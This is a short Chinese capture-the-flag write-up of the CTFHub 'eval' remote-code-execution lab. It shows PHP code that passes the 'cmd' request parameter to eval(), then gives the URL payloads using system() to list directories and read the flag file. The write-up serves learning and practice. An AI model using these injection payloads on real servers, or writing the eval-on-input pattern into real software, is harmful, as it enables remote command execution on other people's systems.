CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
华舞灵瞳7 小时前
学习FPGA(六)锁相环
学习·fpga开发
小裕哥略帅7 小时前
PMP学习笔记--环境
笔记·学习
Darkershadow8 小时前
python学习之串口通信
python·学习
BullSmall9 小时前
普罗米修斯 的学习路径及建议
学习·prometheus
happyjoey2179 小时前
28天立创实力派开发板学习记录part1——DAY1-DAY8
学习
非凡ghost11 小时前
CoolUtils PDF Combine(PDF合并工具)
windows·学习·pdf·软件需求
阿W呀11 小时前
【光的偏振与光功率 / 能量测量学习笔记】
学习
allan bull11 小时前
在节日中寻找平衡:圣诞的欢乐与传统节日的温情
人工智能·学习·算法·职场和发展·生活·求职招聘·节日
wdfk_prog11 小时前
[Linux]学习笔记系列 -- [fs]fs-writeback
linux·笔记·学习
charlie11451419112 小时前
嵌入式现代C++教程:C++98——从C向C++的演化(3)
c语言·开发语言·c++·笔记·学习·嵌入式
热门推荐
01从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击02GitHub 镜像站点033D 圣诞树网页代码04Linux下V2Ray安装配置指南05UV安装并设置国内源06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07电脑检测软件—图吧工具箱08Gemini3 生成的基于手势控制3D粒子圣诞树09Claude Code Skills 实用使用手册10jdk21下载、安装(Windows、Linux、macOS)